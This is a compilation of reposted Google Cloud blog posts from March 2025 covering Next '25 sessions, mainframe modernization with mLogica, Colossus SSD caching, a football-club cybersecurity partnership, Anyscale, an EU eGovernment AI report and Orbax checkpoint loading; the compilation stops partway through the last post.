Google Cloud

2025 03 26

GCP – Google Public Sector takes center stage at Next ‘25 – Sessions you can’t miss

Google is leading a new era of innovation across the public sector. Google Cloud Next ‘25, taking place in Las Vegas from April 9-11, 2025, is the ideal opportunity to see firsthand how our AI and security solutions are transforming education and government.

Our jam-packed agenda at Next ’25 features a wide-range of speakers and sessions to dive deeper into how public sector organizations are leveraging technology to achieve their mission. Event keynotes, lightning talks, breakouts, showcase demos, spotlights, solution talks, and more will provide you with valuable new insights, along with a viable roadmap to help refine your day-to-day operations and long-term strategies via Google’s full-stack technology platform.

Don’t miss this opportunity to immerse yourself in the latest advancements, network with peers, and engage with industry thought leaders. Google Public Sector is committed to helping public sector organizations drive innovation, foster collaboration, and improve citizen and student experiences. For a glimpse into Google Public Sector sessions, speakers and demos at Next, check out our Google Public Sector at Next Session Guide. And be sure to visit Google Public Sector at Booth #2590.

Here are some key sessions to look forward to:

At Google Public Sector, we’re passionate about bringing the best of AI and security to support your mission. Register now for Next ’25 to attend keynotes and sessions that explore groundbreaking new developments, forward-thinking strategies, and our vision for the exciting road ahead.

Read More for the details.

2025 03 26

GCP – Accelerating mainframe modernization with Google Cloud Dual Run and mLogica

Tibor Kiss Cloud, Google Cloud gcp

Mainframe modernization is no longer a question of if, but how, with organizations seeking ways to accelerate modernization while also minimizing costs and reducing risks.

Today, Google Cloud and mLogica announced a strategic partnership focused on accelerating and de-risking mainframe application modernization, combining mLogica’s LIBER*M automated code refactoring platform with Google Cloud Dual Run for validation and de-risking, offering a non-disruptive and validated modernization path to our joint customers.

LIBER*M provides automated assessment, code analysis, dependency mapping, and code transformation capabilities. It supports multiple target languages and platforms, providing a crucial foundation for refactoring projects.

Dual Run enables simultaneous operation of mainframe and cloud applications in parallel, letting you compare and validate refactored applications before cutting over. This, along with powerful testing capabilities, enables a controlled, phased transition, minimizing business disruption and substantially reducing the risks inherent in large-scale mainframe modernization projects.

This partnership with mLogica complements Google Cloud’s existing mainframe modernization solutions, including our Mainframe Refactor offering, with mLogica’s expertise and tools. Together, we can address a wide spectrum of mainframe languages and use cases, and ultimately provide customers with more modernization options.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e1d6c4e6550>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

**Automated code refactoring with LIBER*M**

Enterprises seeking a nuanced approach to mainframe modernization often combine multiple modernization patterns, for example, reimagining the application with Google Gemini Accelerated application rewrites, as well as refactoring workloads. For applications where innovation and new capabilities are critical, generative AI can help reimagine them from the ground-up as entirely new cloud-native applications and user experiences. But for workloads where modernization speed is critical, customers can choose automated code refactoring from legacy languages to modern equivalents, which optimizes for cloud deployment while delivering functional parity. This strategy maximizes innovation and cost-efficiency, balancing the desire for deep modernization with practical considerations of cost and time-to-value.

Refactoring involves transforming existing mainframe applications (often written in COBOL, Assembler and other legacy languages) into modern languages and architectures, typically Java or C# running on cloud-native platforms and services, through rule-based transformation. This is distinct from other modernization patterns such as replatforming, which focuses only on infrastructure changes, or rewriting, which recreates the target application from the ground-up.

Refactoring offers several advantages for customers, striking a good balance between modernization potential and speed:

Refactored applications leverage modern development practices (CI/CD, DevOps) and cloud-native services, enabling faster feature delivery and response to changing business needs.
Modern languages and architectures are easier to maintain and enhance, reducing technical debt and expanding the pool of available talent.
Refactored applications are designed to integrate with cloud services, such as databases, analytics, and AI/ML.
Cloud-native architectures are inherently scalable and elastic, allowing applications to adapt to fluctuating demands.
While refactoring requires an upfront investment, the long-term benefits of reduced infrastructure costs, improved efficiency, and faster innovation often lead to a lower total cost of ownership.

Refactoring doesn’t imply a monolithic approach. It supports a wide modernization spectrum, from automated code conversion to more extensive architectural redesign. The optimal approach depends on the specific application and business goals.

The mLogica modernization foundation

mLogica brings a comprehensive suite of tools and decades of experience to the mainframe modernization challenge. Key products include:

LIBER*M: This platform provides automated assessment, code analysis, dependency mapping, and code transformation capabilities. It supports multiple target languages and platforms, providing a crucial foundation for refactoring projects.
CAP*M: As a dedicated solution for database migration and modernization, CAP*M facilitates the transition from legacy databases (e.g., IMS, DB2) to open-source or cloud-native databases.
STAR*M: Allows for automated testing during modernization.

These tools are complemented by mLogica’s deep expertise in mainframe technologies and modernization methodologies.

Google Cloud Dual Run directly addresses the key challenges customers face when refactoring mainframe applications: de-risking the modernization, validating and certifying the new system, and ensuring comprehensive testing. By enabling parallel operation of the original mainframe application and its modernized counterpart on Google Cloud, Dual Run eliminates the need for a “big bang” cutover, significantly reducing the risk of business disruption. Parallel operation of both legacy and modernized environments allows for continuous validation, helping to ensure the modernized application behaves as expected under real-world conditions. This kind of parallel processing facilitates extensive testing, including performance, functional, and regression testing, and identification of any discrepancies before the final switch.

Helping our joint customers

This partnership is about delivering real outcomes for customers engaged in mainframe modernization, significantly reducing risk, accelerating time-to-value, and lowering overall costs.

Together, we have certified the combined solution of Dual Run and mLogica’s tools, validating the effectiveness in real-world modernization scenarios. The combination of mLogica’s automated refactoring with LIBER*M and Google Cloud’s Dual Run parallel operation minimizes the potential for errors, downtime, and business disruption. Automation streamlines the modernization process, while Dual Run facilitates application validation and certification, alongside robust testing and a rollback capability for enhanced confidence. This combined solution lets you adopt a modern, cloud-native architecture efficiently and securely, positioning your organization for sustained innovation and growth.

mLogica’s LIBER*M and STAR*M products are available for customers directly on the Google Cloud Marketplace. Dual Run is available through our certified mainframe modernization implementation partners. For more details and inquiries please contact mainframe@google.com.

Read More for the details.

2025 03 26

GCP – Colossus under the hood: How we deliver SSD performance at HDD prices

Tibor Kiss Cloud, Google Cloud gcp

From YouTube and Gmail to BigQuery and Cloud Storage, almost all of Google’s products depend on Colossus, our foundational distributed storage system. As Google’s universal storage platform, Colossus achieves throughput that rivals or exceeds the best parallel file systems, has the management and scale of an object storage system, and an easy-to-use programming model that’s used by all Google teams. Moreover, it does all this while serving the needs of products with incredibly diverse requirements, be it scale, affordability, throughput, or latency.

Example application	I/O sizes	Expected performance
BigQuery scans	hundreds of KBs to tens of MBs	TB/s
Cloud Storage – standard	KBs to tens of MBs	100s of milliseconds
Gmail messages	less than hundreds of KBs	10s of milliseconds
Gmail attachments	KBs to MBs	seconds
Hyperdisk reads	KBs to hundreds of KBs	<1 ms
YouTube video storage	MBs	seconds

Colossus’ flexibility shows up in a number of publicly available Google Cloud products. Hyperdisk ML utilizes Colossus solid state disk (SSD) to support 2,500 nodes reading at 1.2 TB/s — impressive scalability. Spanner uses Colossus to address cheap HDD storage with super-fast SSD storage in the same filesystem, the foundation of its tiered storage feature. Cloud Storage uses Colossus SSD caching to deliver the cheapest storage while still supporting the intensive I/O of demanding AI/ML applications. Finally, BigQuery’s Colossus-based storage provides super-fast I/O to extra-large queries.

We last wrote about Colossus some time ago and wanted to give you some insights on how its capabilities support Google Cloud’s changing business and what new capabilities we’ve added, specifically around support for SSD.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e1d6afa73a0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Colossus background

But first, here’s a little background on Colossus:

Colossus is an evolution of the Google File System (GFS).
The traditional Colossus filesystem is contained in a single datacenter.
Colossus simplified the GFS programming model to an append-only storage system that combines file systems’ familiar programming interface with the scalability of object storage.
The Colossus metadata service is made up of “curators” that deal with interactive control operations like file creation and deletion, and “custodians,” which maintain the durability and availability of data as well as disk-space balancing.
Colossus clients interact with curators for metadata and then directly store data on “D servers,” which host its HDDs or SSDs.

It’s also important to understand that Colossus is a zonal product. We build a single Colossus filesystem per cluster, an internal building block of a Google Cloud zone. Most data centers have one cluster and thus one Colossus filesystem, regardless of how many workloads run inside the cluster. Many Colossus filesystems have multiple exabytes of storage, including two different filesystems that have in excess of 10 exabytes of storage each. Being able to scale this high helps ensure that even the most demanding applications don’t run out of disk space close to their cluster compute resources within a zone.

These same demanding applications also need a large amount of IOPS and throughput. In fact, some of Google’s largest filesystems regularly exceed read throughputs of 50 TB/s and write throughputs of 25 TB/s. This is enough throughput to send more than 100 full-length 8K movies every second!

Nor do we rely on Colossus only for large streaming I/Os. Many applications do small log appends or small random reads. Our busiest single cluster delivers over 600M IOPS, combined between reads and writes.

Of course, to achieve such great performance, you need to get the right data to the right place. It’s hard to read at 50 TB/s if all of your data is located on slow disk drives. This leads us to two important new innovations in Colossus: SSD caching and SSD data placement, both powered by a system we call “L4”.

What’s new in Colossus SSD placement?

In our previous Colossus blog post, we talked about how we place the hottest data on SSDs and balance the remaining data across all of the devices in the cluster. This is all the more pertinent today, as over the years, SSDs have gotten more affordable, increasing their prominence in our data centers. No storage designer would ever just spec a system just built out of HDDs anymore.

However, SSD-only storage still poses a substantial cost premium over a blended storage fleet of SSD and HDD. The challenge is putting the right data — the data that gets the most I/Os or needs the lowest latency — on SSD while keeping the bulk of the data on HDD.

With that, let’s look at how Colossus identifies the hottest data.

Colossus has several ways to select data for placement on SSDs:

Force the system to place data on SSD: Here, an internal Colossus user forces it to place data on SSD. Users can do that through the path: /cns/ex/home/leg/partition=ssd/myfile. This is the easiest approach, and ensures that the file is completely stored on SSD. At the same time, it is the most expensive option.
Utilize hybrid placement: More sophisticated users can take advantage of “hybrid placement” and tell the Colossus system to place only one replica on SSD: /cns/ex/home/leg/partition=ssd.1/myfile. This is a more affordable approach, but if the D server with the SSD copy is unavailable, accesses suffer from the latency of HDDs.
Use L4: For the bulk of the data at Google, most developers use the newer L4 distributed SSD caching technology, which dynamically picks the data that is most suitable for SSD.

L4 read caching

The L4 distributed SSD cache analyzes the access patterns for an application and automatically places the data that is most suited for SSD.

When functioning as a read cache, L4 index servers maintain a distributed read cache:

That means that when an application wishes to read some data, it first consults an L4 index server. That index informs the client whether the data is in cache, in which case the client reads the data from one or more SSDs, or tells the cache it is a cache miss, and the client fetches the data from the disk Colossus has placed it on.

On cache misses, L4 can decide to insert the accessed data into the SSD cache. It does so by informing an SSD storage server to transfer the data from the HDD server. Eventually, as the cache fills up, L4 deletes some items from the cache, freeing space for new insertions.

L4 can be more or less aggressive about how much data to place on SSD. We use a machine learning (ML) powered algorithm to decide between different policies for each workload: insert into the L4 cache when the data is written, after the first time it is read, or only after the second time it is read within a short time period. To learn more about how we do this, please read the CacheSack paper.

This approach works well for applications that read the same data often and has dramatically improved our IOPS and throughput. At the same time, it does have a major weakness: we still write the new data to an HDD. And it turns out that there are other important classes of data where L4 read caching isn’t as effective at saving resources as we’d like, namely data that is written, read, and deleted quickly (such as intermediate results for a large batch-processing job), and database transaction logs and other files that see many tiny appends. Because both of these workloads are poorly suited to HDD, it’s preferable to write them directly to SSD, and skip HDD entirely.

L4 writeback for Colossus

Now, imagine that an internal Colossus user wants to place a portion of their data on SSD — they need to carefully think about which files should go on SSD and how much SSD quota they should purchase for their workload. And if they have older files that aren’t being accessed, they might want to migrate that data from SSD to HDD. But from watching our users’ experience, we know that deciding on these parameters is quite hard. To help, we enhanced the L4 service to automate this work.

When being used as a writeback cache, the L4 service advises Colossus curators on whether or not to put a new file on SSD, and for how long. This is tricky! At file creation time, Colossus can only see the application that’s creating the file and its name — it doesn’t know for sure how it will be used.

To solve this problem, we use the same approach as the L4 read cache described in the CacheSack paper mentioned above. The application passes features to L4 such as the file type, or metadata about the database column whose data is stored there. L4 uses these features to segregate the files into “categories” and observes the I/O patterns of each category over time. These I/O patterns drive an online simulation of different placement policies, such as “place on SSD for one hour,” “place on SSD for two hours,” or “don’t place on SSD.” Based on this simulation, L4 chooses the best policy for each category.

These online simulations also serve another important purpose: They predict what placement L4 would choose if more or less SSD capacity were available. Thus, we can predict how much I/O can be offloaded from HDD with different amounts of SSD. These signals drive purchases of new SSD hardware and inform planners of ways to shift SSD capacity between applications to maximize efficiency.

When instructed, the curator can then direct new files to SSD rather than to the default HDD. After a set amount of time, if the file still exists, the curator migrates the data from SSD to HDD:

When the L4 systems’ simulation correctly predicts the file access patterns, we place a small portion of our data on SSD, which absorb most of the reads (which tend to happen to newly created files), before migrating the data to cheaper storage, minimizing the overall cost. In the best case scenario, the file is deleted before we migrate it to HDD, avoiding all HDD I/O.

Colossus SSD and Google Cloud

As the basis for all of Google and Google Cloud, Colossus is instrumental in delivering reliable services for billions of users, and its sophisticated SSD placement capabilities help keep costs down and performance up while automatically adapting to changes in workload.

Ultimately, our goal is to maximize storage efficiency and performance without end-users having to be an expert on every detail of HDDs, SSDs, and Colossus. We’re proud of the system we’ve built so far and look forward to continuing to improve the scale, sophistication, and performance. Visit us at Next ‘25 and attend breakout sessions “What’s new with Google Cloud’s Storage” (BRK2-025) and “AI Hypercomputer: Mastering your Storage Infrastructure” (BRK2-020) to learn more.

Read More for the details.

2025 03 26

GCP – Securing the future of football: Google Cloud and Atlético de Madrid expand cybersecurity partnership

Tibor Kiss Cloud, Google Cloud gcp

In an era where digital security is more important than ever, Atlético de Madrid is strengthening its defenses beyond the pitch. Known for their resilience and tactical discipline on the field, the club is taking the same proactive approach to securing its digital operations and fan experience.

At Google Cloud, we are proud to be extending our partnership with Atlético de Madrid to become the official cybersecurity partner across both the women’s and men’s teams, reinforcing our shared commitment to innovation and resilience in sports technology.

Kicking off the partnership

Since our collaboration began, Google Cloud and Atlético de Madrid have worked together to explore innovative ways to enhance the club’s cybersecurity posture. Paramount has been thinking through the importance of protecting sensitive data and maintaining the integrity of digital operations, including the security of its vast fanbase. Over the past months, we have worked together to better understand the threat landscape that Atlético de Madrid faces, and have begun to apply best practices in cybersecurity awareness and resilience.

Atlético de Madrid has invested in improving protection of both operational and fan data by moving to Google Cloud’s Backup and Disaster Recovery Service. This service, which automatically encrypts data at rest, ensures critical data and systems remain protected and operations can swiftly recover from any potential disruption.

Understanding the threat landscape

Atlético de Madrid, and other global sports clubs, face a range of cybersecurity threats that could impact operations, reputation, and fan trust. These challenges include:

Data breaches and fan data protection: With extensive amounts of personal data, including payment information and preferences, clubs must ensure stringent protection to comply with GDPR and prevent identity theft or fraud.
Ransomware attacks: A cyberattack could cripple critical operations such as ticketing, merchandising, and performance analysis — especially during crucial game weeks.
Website and mobile app security: As digital platforms play a crucial role in fan engagement, securing these touchpoints against defacement and DDoS attacks is essential.
Phishing and social engineering: Players, staff, and even fans are potential targets for phishing attempts aimed at stealing credentials and financial information.

Ensuring that these potential threats are being addressed with a strong cybersecurity posture does more than protect Atlético de Madrid’s digital infrastructure — it enhances every player, employee, and fan interaction with the club and the beautiful game.

Cybersecurity also plays a key role in preventing online scams and protecting fans from fraudulent ticket sales and merchandise offers. Even inside the stadium, robust security ensures that essential systems like electronic access controls and signage remain operational, providing a seamless experience for everyone.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e23a57046a0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Looking ahead

Moving forward, Google Cloud will continue to work alongside Atlético de Madrid to strengthen its security capabilities, explore new ways to innovate, and ensure the club remains protected in today’s fast-evolving threat landscape.

For Atlético, this partnership goes beyond just implementing security measures, it’s about creating a safe and positive experience for everyone who interacts with the club.

“The safety and trust of our digital ecosystem is at the heart of everything we do,” said René Abril, CIO, Atlético de Madrid. “Cybersecurity plays a critical role in ensuring that every interaction with Atlético de Madrid — whether purchasing tickets, engaging online, or accessing club services — is secure and seamless. Working alongside Google Cloud has already given us valuable insights that we can use to strengthen our defenses and knowledge about the kind of threats facing every football club around the world.”

Google Cloud’s collaboration with Atlético de Madrid exemplifies how cybersecurity can enable innovation in sports technology. “Sports clubs today operate in an increasingly digital world, making cybersecurity more important than ever,” said Cristina Pitarch, Managing Director EMEA, Google Cloud Security. “Atlético de Madrid’s proactive approach sets a strong example for the industry. We’re excited to support their journey by sharing our expertise, exploring new challenges, and helping them build a secure foundation for the future.”

As technology and sports increasingly intersect, cybersecurity must remain a top priority. Through our ongoing partnership, we aim to set new standards in digital protection, ensuring Atlético de Madrid and its fans can enjoy every aspect of the game with confidence.

Read More for the details.

2025 03 25

GCP – Anyscale powers AI compute for any workload using Google Compute Engine

Tibor Kiss Cloud, Google Cloud gcp

Over the past decade, AI has evolved at a breakneck pace, turning from a futuristic dream into a tool now accessible to everyone. One of the technologies that opened up this new era of AI was Ray.

As the open-source AI Compute Engine, Ray has made it easier for developers to scale the most complex workloads such as multimodal data processing, model training, and inference across traditional and generative AI. Developed by Robert Nishihara, Philipp Moritz, and Ion Stoica at UC Berkeley’s RISELab in 2016, Ray powers AI and machine learning workloads and platforms for companies such as Netflix, Uber, RunwayML, and OpenAI.

In conversations across our community, we often see how solutions evolve incrementally to meet business demands — starting from data analytics with frameworks like Spark on traditional infrastructure (CPUs), progressing into machine learning and deep learning with GPUs and frameworks like PyTorch and TensorFlow, and now rapidly expanding into generative AI and the introduction of TPUs.

This incremental, bottom-up approach has led organizations into the AI Complexity Wall: fragmented infrastructure, countless accelerators, proliferating models, dozens of different frameworks, complex multimodal data processing, and a need to scale. Without a unified and optimized infrastructure, complexity quickly spirals into excessive cloud spending, resource inefficiencies, and productivity bottlenecks.

To solve this, Ion and his two Ph.D. students founded Anyscale, building upon Ray to offer a secure, scalable, cost-efficient, reliable, and optimized Unified AI Platform. Anyscale simplifies AI complexity, deployable in your environment or hosted by us, empowering teams—from a single laptop to thousands of GPUs—to accelerate AI model training and deployment.

Our motto is clear: “Any accelerator, any stack, any data, any model, any scale.”

And the results are powerful: Canva boosted machine utilization to almost 100% for distributed model training and lowered cloud costs by 50%, RunwayML is using massive video datasets for their multimodal foundation model Gen3-Alpha, Recursion processes 180 million images 7X faster, and Attentive lowered costs a staggering 99% while using 12X more data to create better models for their AI powered marketing platform.

To deliver these results, we needed extremely agile, efficient, cost-effective, and performant infrastructure — something that’s become even clearer in the opening weeks of this year amid some of the recent breakthroughs gen AI providers have unlocked.

We knew early on that the shape of infrastructure would be crucial, and that we needed flexibility from our cloud provider on this front. To meet our customers’ needs, we needed a cloud provider who could meet our own complex and demanding requirements.

And, as a compute orchestration platform that works across most of the major cloud services, we have some perspective on what makes each one unique.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e3afb3bc040>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>

Flexible compute options for efficiency

Organizations are undertaking increasingly sophisticated AI projects—like orchestrating multiple LLMs (and non LLMs), across diverse frameworks, to deliver compound AI and agentic applications. AI workloads now span data processing, training, tuning, inference, and serving with models of widely varying sizes and end application user requirements.

To deliver these AI applications in production, our customers need to be as efficient as possible in their GPU utilization and cloud expenditures while meeting these requirements. While every cloud provider handles infrastructure a little bit differently, one of the things that makes Google Cloud different is how it handles the shape of infrastructure. That means hundreds of different instance types, each offering flexibility to choose from a wide range of GPUs and TPUs in differing amounts.

With Anyscale, customers can unlock this flexibility to optimize and run each model and workload on the most efficient hardware for the task. A single cluster can be made up of hundreds of machines, some with TPUs, some GPUs, to meet specific application requirements while lowering costs.

Plus, Anyscale supports leveraging Spot, On-Demand, or fixed Capacity Reservations as it runs AI workloads – optimizing for price, availability, and efficiency. And it dynamically updates clusters to optimize for utilization. If you’ve got two nodes running at around 40%, nodes will dynamically adjust and scale down with zero interruption.

Leading Performance

Performant infrastructure can be the difference between getting to production or not. Working with Compute Engine, we can launch clusters of hundreds of nodes in less than 60 seconds. That fast launch time coupled with Ray’s ability to auto-scale has a huge impact on deploying AI applications. Imagine being able to launch hundreds of training or tuning jobs in parallel, each with thousands of machines using spot, and scaling back down to zero within seconds.

We have one customer who saves over 18,000 GPU hours of compute PER MONTH thanks to how quickly clusters launch and scale.

Or imagine an online serving application where you suddenly get a large influx of traffic to your AI service thanks to a new feature launch or the enthusiasm of a group of influential devs, forcing you to quickly scale up even if you have large LLMs. With Anyscale, don’t over provision for compute or miss SLA’s waiting for machines to launch.

Run anywhere, your way

The biggest consideration we have when we look to deploy Anyscale for a customer is where they will be running their workloads. Ultimately, we’re a distributed computing platform, and we enable our customers to scale AI workloads anywhere. But those workloads will always be heavily dependent on the data itself. One of our key value propositions is that we can unlock compute anywhere, whether it’s a hosted environment, public cloud, or private cloud.

This offers customers the freedom they need to not only run their models the way they need, with fewer limitations, but also not to have to think about how it all works. And that goes back to our core mission — playing a big, if quiet, role in supporting our customers as they grow, innovate, and refine their technologies.

Many customers take advantage of Cloud Storage and BigQuery to maintain all the data they’re using to train their models. So, for our customers, it made sense for us to prioritize working on Google Cloud as a first class provider. It makes it easier to integrate into their environment and run AI workloads close to their data.

Since Google Cloud is a global provider with a common set of APIs, we can also deploy in all commercial regions to help support security or privacy requirements for customers. That’s helped us rapidly expand to new markets.

While we started with our Compute Engine stack, we needed to complete the vision of “any stack” to support the robust ML ecosystem that has developed around Kubernetes.

Thanks to our work with the Google Kubernetes Engine (GKE) team, we have recently delivered the Anyscale Operator for K8s. Users can deploy Anyscale on their existing Kubernetes clusters, supercharging their AI workloads with the best performance, scalability, cost efficiency, and reliability. Together, RayTurbo, our hyperoptimized version of Ray, and GKE, form the Distributed OS for AI.

Launching AI at massive scale

The compute requirements to train state-of-the-art models has grown 5x – EVERY YEAR! This has been driven by scaling laws which simply say that more data and more compute lead to better models.

More compute obviously means higher costs…and the cost of training has increased more than an order of magnitude every 2 years.

This scaling applies to not only training, but also inference. Recently OpenAI released o1, the most advanced reasoning model where the context can be orders of magnitude larger than before — it can take 10s of seconds to generate a single answer. This is the beginning of a new scaling era for model inference.

And finally, the era of multimodal data is here. Multimodal data like text, audio, images, and video, comprise as much as 80% of an organization’s data are inherently much bigger than structured data.

AI today NEEDS scale.

Anyscale is built on GCE and GKE, meaning customers can scale from a single node and GPU to data center scale. We have one customer that processes 10 million videos a day over 10,000 GPUs, all powered by Google Cloud.

Lesson learned from scaling AI

The pace of AI innovation is staggering. We want to make sure that Ray continues to be the de facto standard for AI/ML workloads, and that Anyscale becomes known as the most performant, secure, and reliable platform to deliver Ray.

We have learned quite a few lessons about scaling AI over the past few years, including the following:

Reliability needs to be consistent at any scale. As scale increases, the probability of hardware failure increases. This forced us to double down on important functionality to handle memory limits, monitoring and observability, built-in fault tolerance, retry logic, and checkpointing.
Scaling is not just about nodes – it’s about scaling observability, too. The size of logs generated from 5k+ node clusters is extreme, and building tools that work in that environment is often harder than just scaling that size altogether.
Speed matters. With large-scale clusters, speed in moving data or processing closer to data is important, as is getting the compute running so you do not idle. Anyscale has focused on all aspects of the stack to enable the fastest speeds possible.
Scaling during development avoids a lot of pain. Developers mostly work on single nodes or local laptops. At Anyscale, we’ve built developer workspaces that can scale, allowing better testing in the distributed environment and an ability to clone the production environment and mirror it exactly to troubleshoot.
Developer velocity determines project success. Machine learning is a process of trial and error (quite literally). Developers need the ability to move quickly with their experiments and platforms shouldn’t stand in the way of results. Ray’s developer-friendly interface makes it easy to unlock traditionally complicated workloads through its libraries. Meanwhile Anyscale provides the means to develop directly against autoscaling Ray clusters without worrying about underlying infrastructure while providing the observability tools to resolve issues quickly.
Performance and efficiency define the bottom line. Compute for AI is expensive. You need to take full advantage of the resources on the most price performance hardware available. Ray is inherently designed to support heterogenous clusters and fractional resource allocations to right size your workloads. Anyscale takes it a step further by continuously landing on the most cost efficient machines across existing reservations, spot, and on demand.

While we continue to work toward enabling more powerful AI technologies, we remain focused on enabling developers to solve their unique AI challenges with performant, reliable, and cost efficient infrastructure. As the rules and capabilities of AI are changing constantly, Anyscale and Google will be ready for whatever comes next.

Read More for the details.

2025 03 25

GCP – The AI Revolution in EU Digital Government: From Belief to Bold Implementation

Tibor Kiss Cloud, Google Cloud gcp

A new report published today by Implement Consulting Group, entitled “The AI opportunity for eGovernment in the EU”, finds that adopting generative AI can unlock a EUR 100 billion opportunity for EU public administrations through enhanced productivity and create significant value for EU citizens and businesses.

AI is not merely a technological advancement to consider, but a fundamental “imperative” for the evolution of eGovernment across the EU, with productivity savings being a key enabler.

This bold statement signifies a pivotal moment. It moves beyond the theoretical discussions and acknowledges the critical role AI must play in shaping the future of how European governments interact with their citizens and deliver essential services. The report, commissioned by Google, pinpoints a crucial opportunity for the EU and its member states: to evolve from being “convinced believers” in the potential of AI to become “fast implementers” of this groundbreaking technology within their digital infrastructures.

The transition from belief to rapid implementation carries profound implications. For years, the potential of AI to enhance efficiency, personalize services, and drive innovation in the public sector has been acknowledged.

Generative AI could enhance the productivity of public administrations in EU member states by 10%, equivalent to an extra EUR 100 billion in value annually with the same resources. 60% of this potential comes from more efficient administrative processes, freeing resources for critical areas such as health and welfare. The remaining 40% comes from improving service quality and speed, making government services more accessible and user-friendly. This is because AI can analyze vast amounts of data to understand citizen needs better, enabling governments to offer more personalized and even proactive services. Imagine a system that anticipates a citizen’s need for a specific document or benefit based on their life events.

Low-risk applications—such as automating routine tasks and improving document processing—account for 15–20% of generative AI’s potential and should be prioritised first. These use cases enable governments to gain AI experience in a controlled, low-risk environment while strengthening governance frameworks.

Generative AI can increase productivity of EU institutions by 12%
Generative AI could boost productivity by 12% within EU institutions, assisting employees with complex legislative, executive, judicial, and financial tasks. With 60,000 people employed across EU institutions, generative AI adoption could enhance decision-making, improve efficiency, and better allocate resources.

By integrating generative AI into administrative processes, EU institutions could reduce bottlenecks in approvals, accelerate compliance procedures, and make regulatory frameworks clearer and more accessible.

AI-powered tools like chatbots and translation services which can also improve accessibility to government services for citizens with diverse needs and language backgrounds.

Using AI at Scale
AI infrastructure for the public sector requires efficient scalability, adaptability to emerging technologies and multi-cloud operation, robust security with data privacy and cybersecurity, and interoperability for collaboration. Due to the high cost and inefficiency of adapting on-premise supercomputers for state-of-the-art AI, widespread adoption in public administration relies on a secure and robust cloud infrastructure, making specialized suppliers the most cost-efficient and scalable solution.

The Opportunity for EU Leadership
The report emphasizes a significant opportunity for the EU Governments to lead the digital government revolution driven by AI. By adopting a proactive and strategic approach to AI implementation, the EU can set global ethical and regulatory standards for AI in the public sector, foster innovation and attract talent, enhance citizen engagement through user-friendly and responsive services, and boost economic competitiveness by leveraging AI to improve public sector efficiency and create new economic growth opportunities.

Governments must act now to accelerate AI adoption
Governments play a critical role in setting the stage for AI adoption. To realise AI’s full potential, public administrations must focus on building the necessary infrastructure, ensuring data quality, fostering AI-related skills, and providing regulatory clarity.

If AI adoption is delayed, for example due to uncertainties around cloud infrastructure or compliant cross-sectoral data sharing practices, the gross potential for the EU could be drastically reduced. Additionally, barriers like skills shortages and insufficient R&D may also delay adoption. A five-year delay in the start of adoption of generative AI could reduce the potential to a GDP contribution of EUR 0.3–0.4 trillion.

A secure, scalable AI infrastructure tailored for public administration is key to effective deployment. High-quality data governance will enable AI-driven improvements, while simplified rules and harmonised GDPR implementation will facilitate responsible AI adoption. Equally important is equipping civil servants with the knowledge and expertise to use AI effectively in their daily work.

AI is no longer a distant prospect but a central pillar of the future of eGovernment in the European Union. The journey has begun, and the world will be watching as the EU embarks on this crucial transformation.

Read More for the details.

2025 03 24

GCP – Speed up checkpoint loading time at scale using Orbax on JAX

Tibor Kiss Cloud, Google Cloud gcp

Imagine training a new AI / ML model like Gemma 3 or Llama 3.3 across hundreds of powerful accelerators like TPUs or GPUs to achieve a scientific breakthrough. You might have a team of powerful computers working in sync, constantly learning and refining. But every so often, they need to save their progress — a “checkpoint” — and then pick up from this known state in the case of an interruption.

With the traditional approach, each device independently reads the same checkpoint from a central storage like Google Cloud Storage (GCS), resulting in duplicate data transfers. When GCS bandwidth of a project is fully utilized, it causes significant delays before training even begins. This bottleneck isn’t just an inconvenience; it cuts productivity and increases cost (remember that you’re paying for all the accelerators that are waiting while the checkpoint is being saved or restored).

Today, we’ll explore how you can deliver efficient checkpoint loading and unlock faster, more cost-efficient, and more impactful AI development.

The solution: Single-replica broadcasting

Google engineers found a way to optimize checkpoint loading with Orbax and JAX so developers can get back to the work that matters. Orbax is a toolkit designed to streamline the process of saving and loading checkpoints for machine learning models, particularly those built using the JAX. JAX is a high-performance Python library that focuses on high-performance numerical computing.

The core idea behind our solution in Orbax is simple yet powerful: instead of every device fetching the entire checkpoint, only one replica (copy) downloads it. This replica then broadcasts the checkpoint data to all other replicas in the training setup. The approach leverages high-speed interconnects like DCN (Data Center Network) and inter-chip interconnect (ICI) to facilitate rapid data transfer between machines.

There’s a trade-off between the time saved reading data from external storage like GCS and the time spent replicating/broadcasting. Broadcasting requires compiling Python code into low-level instructions for your hardware (like GPUs or TPUs), which takes time. However, when data reading bandwidth becomes a bottleneck, this compilation time becomes negligible compared to the time wasted by redundant data reads. This is when reading a checkpoint on one device then broadcasting that checkpoint to other devices significantly speeds up the process. The solution achieves this by quickly reading the checkpoint from GCS on a single replica and efficiently distributing the data to other devices.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3e84bc64cbb0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>

This optimized checkpoint loading approach has already demonstrated significant speedups in practice.

To evaluate the efficiency of our optimized checkpoint loading technique, we ran benchmarks on different hardware devices.

We saw a 6.8x speedup on a CPU cluster with 2048 VMs (32 slices of 64 `n2-standard-32` VMs). Note: Due to observed performance fluctuations during CPU testing at this scale, the reported CPU benchmark is an average of several runs.

